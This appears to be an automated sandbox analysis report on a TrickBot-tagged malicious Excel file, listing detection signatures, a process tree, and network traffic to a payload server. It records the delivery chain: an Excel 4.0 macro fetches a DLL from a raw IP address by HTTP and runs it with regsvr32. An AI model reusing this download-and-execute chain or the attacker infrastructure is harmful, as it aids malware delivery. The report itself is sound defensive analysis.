Loading ...

Play interactive tourEdit tour

Analysis Report Order_Summary-9632850.xlsb

Overview

General Information

Sample Name:Order_Summary-9632850.xlsb
Analysis ID:432380
MD5:d091fb57338164acff3bd648a1782fd9
SHA1:ca63bade67055580f6be380cd41bb98affd5de49
SHA256:12bbd7661b6fd48f3552101588625bde0709dd68b28a0677d000a02389e3b812
Tags:sat1TrickBotxlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Abnormal high CPU Usage
Antivirus or Machine Learning detection for unpacked file
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5620 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 4912 cmdline: regsvr32 -s ..\kdldyeff.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • cmd.exe (PID: 5800 cmdline: C:\Windows\system32\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s ..\kdldyeff.dll, CommandLine: regsvr32 -s ..\kdldyeff.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5620, ProcessCommandLine: regsvr32 -s ..\kdldyeff.dll, ProcessId: 4912

    Signature Overview

    Click to jump to signature section

    Show All Signature Results
    Source: 3.2.regsvr32.exe.2c00000.2.unpackAvira: Label: TR/Dropper.Gen
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

    Software Vulnerabilities:

    barindex
    Document exploit detected (creates forbidden files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dllJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\kdldyeff.dllJump to behavior
    Document exploit detected (drops PE files)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: sat1_0609_2[1].dll.0.drJump to dropped file
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
    Source: global trafficTCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80
    Source: global trafficTCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 06:47:07 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    Source: global trafficHTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: unknownTCP traffic detected without corresponding DNS query: 185.180.199.121
    Source: global trafficHTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.comodoca.com0
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0C
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.digicert.com0O
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://ocsp.sectigo.com0
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: sat1_0609_2[1].dll.0.drString found in binary or memory: http://www.digicert.com/CPS0
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.aadrm.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.cortana.ai
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.office.net
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.onedrive.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://apis.live.net/v5.0/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://augloop.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://augloop.office.com/v2
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cdn.entity.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://clients.config.office.net/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://config.edge.skype.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cortana.ai
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cortana.ai/api
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://cr.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dataservice.o365filtering.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dataservice.o365filtering.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dev.cortana.ai
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://devnull.onenote.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://directory.services.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://graph.ppe.windows.net
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://graph.ppe.windows.net/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://graph.windows.net
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://graph.windows.net/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://incidents.diagnostics.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://lifecycle.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://login.microsoftonline.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://login.windows.local
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://management.azure.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://management.azure.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://messaging.office.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ncus.contentsync.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ncus.pagecontentsync.
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://officeapps.live.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://onedrive.live.com
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://outlook.office.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://outlook.office365.com/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: B709A3E3-2143-4926-A150-50001F594891.0.drString found in binary or memory: https://powerlift.acompli.net
